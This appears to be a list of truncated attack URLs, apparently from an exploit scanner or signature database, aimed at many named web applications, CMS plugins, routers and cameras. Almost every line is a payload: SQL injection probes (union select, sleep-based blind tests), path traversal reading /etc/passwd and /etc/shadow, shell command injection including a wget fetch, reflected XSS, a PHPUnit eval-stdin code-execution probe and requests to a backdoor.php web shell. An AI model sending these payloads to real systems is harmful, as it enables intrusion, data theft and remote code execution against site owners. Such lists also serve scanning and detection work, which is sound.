/appliancews/getLicense?hostName=$(/usr/bin/wget%20http://1.
/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../etc/passwd%
/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../home/dna/sp
/ping.cgi?IPAddr1=12&IPAddr3=12&IPAddr2=12&ping=Ping&IPAddr4
/ping.cgi?IPAddr1=12&IPAddr3=12&IPAddr2=12&ping=Ping&IPAddr4
/html/en/confAccessProt.html
/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../etc/passwd%
/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../home/dna/sp
/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../etc/passwd%
/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../home/dna/sp
/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../etc/passwd%
/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../home/dna/sp
/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recov
/..//etc/passwd
/gadgets/definitions/uptime.CapacityWhatIfGadget/
/ossim/pcap/download.php?scan_name=pass&sensor_ip=1.1.1.1
/wizards/get2post.php?file_name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%
/search/members.json?id%60%3D-1%29%2f%2a%2a%2funion%2f%2a%2a
/fiyo/dapur/apps/app_article/controller/article_list.php?cat
/fiyo/dapur/apps/app_article/controller/article_status.php?f
/fiyo/dapur/apps/app_article/controller/comment_status.php?s
/fiyo/dapur/apps/app_comment/controller/comment_status.php?s
/DesktopModules/C_Info/WebService/C_InfoService.asmx?SOAPAct
/api/saveconfig?key=__import__(%27os%27).system(%27touch%20%
/protocol.csp?fname=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/wordpress/wp-admin/admin.php?page=SpiderCalendar&search_eve
/Embedded_Ace_Set_Task.cgi?$'5003'
/KK_LS9ReportingPortal/GetData?SERVERID=%27;LSF_PROD&&QUERY=
/set_mail.cgi?next_url=mail.htm&loginuse=admin&loginpas=%s&s
/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_
/wp-admin/admin.php?page=masta-lists&action=view_list&filter
/wp-admin/admin-ajax.php?id=&action=my_action&url=%2Fvar%2Fw
/source_selector.php?controller=blog&action=showall&src=@ran
/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_
/ossim/dashboard/sections/widgets/data/image.php?type=test&w
/actionphp/action.input.php?&ActionForm=SendForm&TotalQuery=
/actionphp/download.File.php?&file=../../../../../../etc/pas
/subrion/actions.json?action=delete-file&item=members&itemid
/fiyo/apps/app_article/controller/editor.php?id="%20and%20sl
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php?<?php%20
/commit2.cgi?ADMIN_PASSWD=$1$ZZ0DVlc6$QLqFLzW8YDZObgHtMZrYF/
/home/seos/courier/login.html?auth_params=x%0Dnew:header
/seos/1000/find.api?method=x%27%60id>/tmp/zz%60%27&oauth_tok
/courier/1000@/oauth/playground/callback.html#<img%20src=x%2
/hitehat-fta.accellion.net/courier/1000@/index.html?auth=oau
/courier/web/1000@/wmProgressval.html?server=file:///etc/pas
/cgi?2&[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6%20dataBlockS
/gwadmin-console/install/login.jsp?token=asdf%22%2balert%28%
/gwadmin-console/index.jsp#poa:%3Cimg%20src=x%20onerror=aler
/responder.fcgi1?winid=106&winname=Users%20%26%20Groups&slot
/responder.fcgi1?winid=109&winname=Users%20%26%20Groups&slot
/responder.fcgi1?winid=103&winname=Users%20%26%20Groups&slot
/responder.fcgi0?winid=89&winname=Users%20%26%20Groups&slot=
/dcRedirect/dataChannelMsg.dc?%20<class%20DataPacket>%20[0]%
/cgi-bin/dna/seqreq2N.cgi?username=61685578,2410
/web/google_analytics.php?cmd=set&opt=cloud-device-num&arg=0
/html/en/xprtCmd.html
/_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4a69e249
/FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id
/index.php?option=com_contactformmaker&view=contactformmaker
/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff8
/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff8
/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b
/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b
/index.php?c=api&m=data2&auth={md5(SYS_KEY)}&param=action=re
/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b
/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b
/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff8
/index.php?c=weixin&m=sync&url=http://www.baidu.com
/fiyo/apps/app_comment/controller/insert.php?send=true&name=
/fiyo/dapur/index.php?app=article&view=tag&act=edit&id=79&ap
/piwigo/admin.php?page=cat_options&section=status&cat_false%
/piwigo/admin.php?page=cat_options&section=comments?cat_true
/piwigo/admin.php?page=cat_options&section=comments&cat_true
/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Eale
/cgi-bin/HASync/hasync.cgi?debug=1
/websitebaker/account/preferences.php?action=details&display
/index.php?option=com_fields&view=fields&layout=modal&list[f
/index.php?option=com_fields&view=fields&layout=modal&list[f
/index.php?option=com_fields&view=fields&layout=modal&list[f
/doli/theme/eldy/style.css.php?lang=de%27%20procedure%20anal
/doli/societe/list.php?sall=asd%3Cscript%3Ealert(%22xss%22)%
/yeager/y.php/responder?handler=recoverLogin&us=sess_20000&l
/yeager/y.php/responder?handler=setNewPassword&us=sess_20000
/yeager/ui/js/3rd/plupload/examples/upload.php
/photostore/manager/mgr.login.php?pmode=recover_login&email=
/zm/index.php?view=request&request=log&task=query&limit=100;
/zm/index.php?view=request&request=log&task=download&key=a9f
/zm/index.php/LSE4%22%3E%3Cscript%3Ealert(1)%3C/script%3ELSE
/latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state
/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV
/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV
/index.php?controller=address&action=activate_address&id=1%2
/index.php?controller=blog&action=show&title=xx'%20union%20s
/index.php'%20or%201%3d1--%20
/index.php'%20or%201%3d2--%20
/index.php'%20OR%20SLEEP(1)--%20
/index.php'%20OR%20SLEEP(30)--%20
/genixcms0.0.8/index.php?page=modules&act=activate&token=I34
/GeniXCMS/?author=user1&type=hi%27%20OR%20(SELECT%201431%20F
/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=%3Cimg
/api/content/save/1?address1=e&address2=e&city=e&contactMe=f
/api/content/save/1?address1=e&address2=e&city=e&contactMe=f
/expComment/showComments/content_id/11%20or%20sleep(10)
/categoriesServlet?start=0&count=10&sort=keywords%20LIMIT%20
/categoriesServlet?start=0&count=10&sort=keywords%20LIMIT%20
/exponent/action=manage_ranks&controller=container&lastpage=
/index.php?controller=pixidou&action=exitEditor&exitType=sav
/index.php?controller=pixidou&action=exitEditor&exitType=sav
/takeconfirm.php?id=6&conusr[]=(select*from(select%20sleep(1
/modtask.php?action=confirmuser&userid=(select*from(select%2
/massmail.php?class=666&or=<(select*from(select%20sleep(10))
/takeupdate.php?setdealt=1&delreport[]=0)union%20select%20(s
/takeupdate.php?delete=1&delreport[]=0)union%20select%20(sle
/wp-content/plugins/filedownload/download.php?path=http://ww
/courier/themes/templates/.ooxxooxx.php?ooxxooxx=echo`$_POST
/courier/themes/templates/.ooxxooxx.php?ooxxooxx=echo`$_POST
/courier/B3dKe9sQaa0L.log
/UDDISecurityService/UDDISecurityImplBean?<SOAP-ENV:Envelope
/ajax.cgi?action=tag_ipPing&pip=8.8.8.8%26echo%20test%20OS-I
/simpleupload.py?$'returnpage=/&action=a&tns_appliance_sessi
/Embedded_Ace_Set_Task.cgi?$'5025=data;cat${IFS}/etc/shadow$
/foo.rss
/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf%20'QNAPVJB
/cgi-bin/diagnostics?tsrEmailCurrent=true&currentTSREmailTo=
/cgi-bin/diagnostics?tsrDeleteRestarted=true&tsrDeleteRestar
/ping.cgi?DIA_IPADDRESS=8.8.8.8;cat%20/etc/passwd
/phpmailer/contact_form.php?action=send&msg=Really%20importa
/phpmailer/contact_form.php?action=send&msg=<?php%20sleep(3)
/?------WebKitFormBoundaryzXJpHSq4mNy35tHe%20Content-Disposi
/backdoor.php
/phpmailer/contact_form.php?action=send&msg=<?php%20phpinfo(
/phpmailer/contact_form.php?action=send&msg=Really%20importa
/phpmailer/contact_form.php?action=send&msg=<?php%20sleep(3)
/?------WebKitFormBoundaryzXJpHSq4mNy35tHernContent-Disposit
/backdoor.php?cmd=d2hvYW1p
/phpmailer/contact_form.php?action=send&msg=Really%20importa
/phpmailer/contact_form.php?action=send&msg=<?php%20sleep(3)
/zikula4/jcss.php?f=..........userdatatmp.txt
/cgi-bin/rftest.cgi?lang=en&src=AwServicesSetup.html&a=1&ATE
/es/index.php?option=com_virtuemart&view=categorysearch'%20R
/es/index.php?option=com_virtuemart&view=categorysearch%27+%
/typo3/index.php?id=8&no_cache=1?tx_news_pi1[overwriteDemand
/sources/item.query.php?type=action_on_quick_icon&id=(SELECT
/sources/view.query.php?type=connections_logs&order=(SELECT%
/sources/view.query.php?type=connections_logs&order=date%20A
/sources/view.query.php?type=errors_logs&order=date&directio
/yeager/y.php/tab_USERLIST?win_no=4&yg_id=2-user&yg_type=use
/yeager/y.php/responder?handler=recoverLogin&us=sess_20000&l
/yeager/y.php/responder?handler=setNewPassword&us=sess_20000
/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title="<script>alert(1)
/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=1&title=&content
/ZCMS_1.1/ZCMS_1.1/?dir=login&username=admin&pass=HELL'%20OR
/cgit/blob/cgit.c?mimetype=text/html%0d%0a%0d%0a<script>xss<
/cgi-bin/dna/sysAdmin.cgi?$'investigator=&username=&navUserN
/wp-admin/admin-ajax.php?action=catalogue_update_order&list-
/jq.php?action=loadtransactions&rows=5
/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValu
/xml/system/control.xml?action=reboot
/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValu
/xml/system/control.xml?action=reboot
/assets/php/formmailer/SendEmail.php::/assets/php/formmailer
/fosagent/repl/download-file?basedir=4&filepath=....Windowsw
/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXX
/cgi-bin/CGIProxy.fcgi?cmd=asd&usr=asd&pwd=asd&remoteIp=`pyt
/ladder/stats.php?game=W2BN&type=1&user=cat%20/etc/passwd
/ladder/stats.php?game=cat%20/etc/passwd&type=cat%20/etc/pas
/get_sec.php?q=1%20and%201=1
/index.php?m=promote&f=index&v=search&_su=wuzhicms&fieldtype
/images//lists?cid=13%20)%20ORDER%20BY%201%20desc,extractval
/cms/manager/admin_ajax.php?action=getinfo&tab={pre}vod_topi
/page1-%bf%bf"-page1/'%20AND%20(SELECT%207988%20FROM(SELECT%
/index.php/community/?wpfd=0&wpfob=relevancy&wpfo=desc%2c(se
/forummanage.php/action=addforum&name=1desc=1&sort=11%20or%2
/helpdezk/admin/login/getWarningInfo/id/21%20UNION%20SELECT%
/?page_id=2&eventyear=2015%20AND%201=1%20)--&dateset=on&even
/view.php?id=-1'%20union%20select%201,version(),3,database()
/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&va
/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&va
/wordpress/wp-admin/edit.php?page=eventr%2Fattendees.php&eve
/wordpress/wp-admin/edit.php?page=eventr%2Fevent_form.php&ev
/wordpress/wp-admin/edit.php?page=surveys%2Fsurvey_form.php&
/wordpress/wp-admin/edit.php?page=surveys%2Fquestion.php&sur
/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id
/wp-admin/admin.php?page=rk_user_lists&info=del&did=1%20and%
/wp-admin/options-general.php?page=wordpress-gallery-transfo
/wp-admin/upload.php?_wpnonce=daab7cfabf&action=delete&media
/wordpress/wp-admin/admin.php?page=events&action=delete_recu
/wp-admin/admin-ajax.php?action=ctimeline_frontend_get&timel
/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FRO
/esiclivre/restrito/inc/lkpcep.php?q=AND%20(SELECT%20*%20FRO
/recept.php?id=-1%20union%20select%20user()
/playlists.php?playlist='%20UNION%20SELECT%20null,concat(0x2
/index.php?option=com_tag&amp;task=tag&amp;tag=-`1%20and%201
/download/1%20and%201=1
/category.php?id=1%20and%201=1::/www/author.php?id=1%20and%2
/index.php?cmd=agent&mod=true&ID=1%20and%201=1::/www/index.p
/browse-scategory.php?sc=1%20and%201=1::/www/service-provide
/job-details/1%20and%201=1/eFe
/index.php?option=com_ns_downloadshop&amp;task=invoice.creat
/index.php?option=com_zhyandexmap&amp;view=zhyandexmap&amp;t
/admin/users/?sort=login&edit=1%20and%201=1::/www/admin/temp
/phpsqlsearch_genxml.php?subcategory=1%20and%201=1
/search/tag/1%20and%201=1::/www/friends/index/11%20and%201=1
/index.php?page=news&nid=1%20and%201=1
/viewprofile.php?profid=1%20and%201=1::/www/viewmessage.php?
/admin/members_view.php?id=1%20and%201=1
/add_to_cart.php?product_id=1%20and%201=1
/admin/editadgroup.php?groupid=1%20and%201=1
/office_admin/?pid=95&action=print_charactercertificate&id=1
/?photo=1%20and%201=1
/index.php?action=lookup-county&state=1%20and%201=1
/admin/admin_process.php?act=editpollform&id=1%20and%201=1::
/admin_process.php?act=vdoeditform&id=1%20and%201=1::/www/ad
/index.php?S=1%20and%201=1
/product_view1.php?pid=1%20and%201=1::/www/productcompanyinf
/rate.php?value=1%20and%201=1::/www/content.php?id=1%20and%2
/index.php?nice_theme=1%20and%201=1
/resources.php?action=category&sort=1%20and%201=1
/searchCommercial.php?property_type=1%20and%201=1&city=1%20a
/status_list.php?status_id=1%20and%201=1
/restaurant-menu.php?resid=1%20and%201=1
/view/friend_profile.php?friend_type=Student&friend_index=1%
/single.php?id=1%20and%201=1
/listings.php?catid=1%20and%201=1::/www/ads-details.php?ID=1
/show-flight-result.php?fl_orig=1%20and%201=1::/www/show-fli
/p/VerAyari/1%20and%201=1
/product.php?id=1%20and%201=1::/www/search.php?category_id=1
/searchJob.php?jobType=1%20and%201=1&jobFrequency=1%20and%20
/item_details.php?id=1%20and%201=1::/www/vendor_details.php?
/browse-category.php?cat=1%20and%201=1::/www/browse-scategor
/search_item.php?search=1%20and%201=1::/www/general_item_det
/latest_news_details.php?id=1%20and%201=1
/profile.php?u=1%20and%201=1
/group.php?grid=1%20and%201=1::/www/profile.php?fid=1%20and%
/itechd.php?productid=1%20and%201=1
/show-flight-result.php?&fl_orig=1%20and%201=1::/www/show-fl
/Employer_Details.php?id=1%20and%201=1
/subpage.php?scat=1%20and%201=1::/www/message.php?pid=1%20an
/catcompany.php?token=1%20and%201=1::/www/buyleads-details.p
/movie.php?f=1%20and%201=1::/www/tvshow.php?s=1%20and%201=1:
/browse-category.php?cat=1%20and%201=1::/www/browse-scategor
/single-cause.php?pid=1%20and%201=1
/search.php?cat_id=1%20and%201=1
/domain.php?id=1%20and%201=1
/list?gender=1%20and%201=1&main_search=::/www/list?city=1%20
/jobsearch_all.php?rid1=1%20and%201=1
/category_list.php?search=1%20and%201=1
/product-category.php?key=1%20and%201=1
/courselist.php?subcatid=1%20and%201=1::/www/courselist.php?
/product_details.php?id=1%20and%201=1
/service-list?city=1%20and%201=1&main_search=
/tradeshow-list-detail.php?show_id=1%20and%201=1::/www/view-
/search-results.php?Projectmain=1%20and%201=1&search=::/www/
/booker_details.php?sourcebus=1%20and%201=1
/other-user-profile.php?id=1%20and%201=1
/list?city=1%20and%201=1&main_search=
/news-detail/471%20and%201=1
/list?city=1%20and%201=1&main_search=
/service-list?city=1%20and%201=1&main_search=
/service_detail.php?pid=1%20and%201=1::/www/event_detail.php
/list?city=1%20and%201=1&main_search=
/categories?subctid=1%20and%201=1::/www/categories?&mctid=1%
/jobdetails.php?pr_id=1%20and%201=1::/www/searchbycat_list.p
/list?city=1%20and%201=1&main_search=
/event-list?city=1%20and%201=1&main_search=
/quicksearch.php?q=1%20and%201=1
/investcalc.php?price=1&projid=1%20and%201=1
/list?city=1%20and%201=1&main_search=
/lawyer-list?city=1%20and%201=1&main_search=
/detail/1%20and%201=1
/exams.php?sort=1%20and%201=1
/single_detail.php?sid=1%20and%201=1::/www/category.php?sear
/service-list?city=1%20and%201=1&main_search=
/categories?subctid=1%20and%201=1::/www/categories?&mctid=1%
/single-video-detail.php?video_id=MTMy&report_videos[]=1%20a
/property-list?tbud=5001-100001%20and%201=1&quicksrch1=
/category.php?searchmain=1%20and%201=1&searchcat=1%20and%201
/list?city=1%20and%201=1&main_search=
/success-story.php?succid=1%20and%201=1
/findcity.php?q=1%20and%201=1
/trailer-detail.php?moid=1%20and%201=1::/www/show-time.php?m
/findcity.php?q=1%20and%201=1
/news_detail.php?newid=1%20and%201=1::/www/event_detail.php?
/news-detail.php?newid=1%20and%201=1
/countrycode1.php?val=1%20and%201=1
/city_ajax.php?state_id=1%20and%201=1::/www/category_list.ph
/success-story.php?succid=1%20and%201=1
/city.php?country=1%20and%201=1&state=1%20and%201=1::/www/st
/preview.php?id=1%20and%201=1
/search_result.php?marital=1%20and%201=1&submit::/www/search
/admin/userview.php?uid=1%20and%201=1::/www/admin/viewemcamp
/~paioread/referrals.php?id=10&tier=1
/index.php?option=com_jbuildozer&view=entriessearch&tmpl=com
/index.php/en/component/jequestions/?view=tags&an=1%20and%20
/index.php?option=com_jevideogallery&view=category&id=991%20
/p/1%20and%201=1
/index.php?option=com_jefaqpro&view=category&id=1%20and%201=
/videosharing/search_video.php?search=123::/www/videosharing
/taxibooking_new/admin/carlistedit.php?carid=36
/professional-service/admin/review.php?id=70
/arthi/multivendor/shopping-cart.php?cusid=60
/arthi/multivendor/my_wishlist.php?fid=60
/arthi/multivendor/seller-view.php?usid=60
/newsbee/30[payload]_news_thai_soccer_targets_asia_wide_goal
/ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=det
/event.php?event_id=-123%20union%20all%20select%201,2,@@vers
/index.php?option=com_adagency&controller=adagencyAdvertiser
/listing?keywords=1%20and%201=1&location=All%20United%20Stat
/search/?q=&price_type=range&price=1%20and%201=1
/category/1%20and%201=1
/livecrm/web/index.php?r=site/login&company_id=1%20and%201=1
/site_search.php?s_vehicletype=auto&s_order=1%20and%201=1&s_
/index.php?id=1%20and%201=1::/www/mobile_preview.php?id=1%20
/sellers_subcategories.php?IndustryID=1%20and%201=1::/www/su
/pages/single_blog.php?id=1%20and%201=1
/product-list.php?srch=1%20and%201=1
/site.php?id=1%20and%201=1::/www/pagelist.php?id=1%20and%201
/chat_im/chat_window.php?request_id=1%20and%201=1::/www/sear
/index.php?option=com_jeclassifieds&view=boutique&sid=1%20an
/event.php?id=1%20and%201=1::/www/page.php?slug=1%20and%201=
/index.php?option=com_jereverseauction&view=products&layout=
/index.php?option=com_jmsmusic&view=search&keyword=1%20and%2
/index.php?option=com_jsptickets&controller=ticketlist&task=
/index.php?option=com_jgive&view=campaigns&layout=all&filter
/index.php?option=com_medialibrary&task=view_author&id=1%20a
/index.php?option=com_simplecalendar&view=events&catid[0]=1%
/component/smartshoutbox/archive?shoutauthor=1%20and%201=1
/index.php/en/component/solidres/?location=&checkin=2018-01-
/index.php?option=com_gallery_wd&tag_id=&view=GalleryBox&gal
/index.php?option=com_advertisementboard&Itemid=132&task=sho
/index.php?option=com_jquickcontact&task=refresh&sid=1%20and
/index.php?option=com_ccnewsletter&task=removeSubscriber&id=
/index.php?option=com_avreloaded&view=popup&Itemid=55&divid=
/index.php?option=com_formmaker&view=stats&id=1%20and%201=1:
/index.php?option=com_staffmaster&view=staff&name=1%20and%20
/index.php?option=com_aist&view=showvacancy&id=1%20and%201=1
/index.php/component/jsjobs/newest-jobs?zipcode=1%20and%201=
/index.php?dynfield[phone]=1%20and%201=1&option=com_dtracker
/index.php?option=com_realpin&pinboard=1%20and%201=1
/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=
/index.php?option=com_jomestate&task=detailed&id=1%20and%201
/neorecruit/all-offers/xxx1%20and%201=1.html::/www/neorecrui
/index.php?option=com_bookpro&view=orderdetail&order_number=
/index.php?option=com_fastball&view=player&season=1%20and%20
/index.php?option=com_invitex&view=invites&invite_type=1%20a
/index.php?option=com_timetable&view=event&alias=1%20and%201
/index.php?option=com_dtregister&task=edit&controller=catego
/index.php?option=com_jticketing&view=events&layout=all&filt
/index.php?option=com_saxumnumerology&view=savedresult&publi
/index.php?option=com_saxumpicker&view=savedspread&publicid=
/index.php?option=com_squadmanagement&task=removewarround&id
/index.php?option=com_saxumastro&view=savedreading&publicid=
/index.php?option=com_projectlog&view=cat&search=1%20and%201
/index.php?option=com_cwtags&searchtext[]=1%20and%201=1
/index.php?option=com_abook&view=category&letter=1%20and%201
/index.php?option=com_prayercenter&task=confirm&id=1&session
/index.php?option=com_checklist&view=frontend&title_search=1
/os-property-layouts/search-tools/advanced-search?&option=co
/jobs.php?status=0&level_id=&client_id=0&start_time=&end_tim
/editDisplaynames.do?method=editDisplaynames&resids=1)%20AND
/textpattern/textpattern/index.php?event=link&step=link_chan
/localhost/patch/remote.php?w=recomendar&id=BlindSQL
/mobile-loja/mensagem.asp?msgid=0&msgstr=Venda%20on-line%20e
/module/admin_bp/php/function_bp.php?action=list_process&bp_
/sendrcpackage?keyid=-2544&keysymbol=-4081
/hy-cgi/device.cgi?cmd=searchlandevice
/centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif
/user_contacts.php?user=0%27%20UNION%20SELECT%201,2,3,versio
/index.php?action=attachment&file_name=%27::/index%20.php?ac
/1.2.0/product/search?search_query=1%20and%201=1
/admin/stats_monthly_sales.php?status=%27%3Cscript%3Ealert%2
/admin/?do=disporders&action=detail&id=1+and+1=2+union+selec
/jclassifiedsmanager/classifieds/offerring-ads?controller=di
/ecommercemajor/product.php?productbycat=1%20and%201=1
/index.php?act=category&cid=1%20and%201=1
/admin.php?type=site&action=update&p=1+and+1=2+union+select+
/wordpress/wp-admin/admin-ajax.php?tag_id=0&action=GalleryBo
/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12
/script/load-calendar.php?view=1&month=6&year=2013&cid=1cat%
/?ym_download_id=1%20and%201=1
/backend/main.php?area=con_configcat&idcat=1&idtplconf=0::/b
/wp-admin/admin-ajax.php/?srch_txt='or%201=1--%20&action=the
/path/showads.php?catid=1%20and%201=1
/cgi/client.cgi?act=list_zone&group_id=11%20and%201=1
/admin/pages/modify.php?page_id=11%20and%201=1
/wp-admin/admin-ajax.php?action=myextractXML&vid=1::/wp-admi
/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%
/bacula-web/joblogs.php?jobid=991%20and%201=1
/jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmm
/wp-admin/admin.php?page=wrp-add-new&id=2%20union%20select%2
/acms/admin/uploads.php?id=1%20and(select%201%20FROM(select%
/FoeCMS/index.php?i=1%20and%201=1
/ads.php?catid=4%27a1%20and%201=1
/categories-x.php?getcategories&sortkey=name)%20limit%201;--
/videocat.php?url=test'%20AND%203383=3383%20AND%20'Odau'='Od
/modules/glossaire/glossaire-aff.php?lettre=A%20%and%20SELEC
/modules.php?name=Submit_News&amp;subject=whatever&amp;topic
/costview2/jobs.php?tr=0+union+select+1,2,3,4,5,6,7,8,9,10,1
/site/default.asp?TroncoID=1%20and%201=1
/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&cat
/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,ve
/download.php?category=1%20and%201=
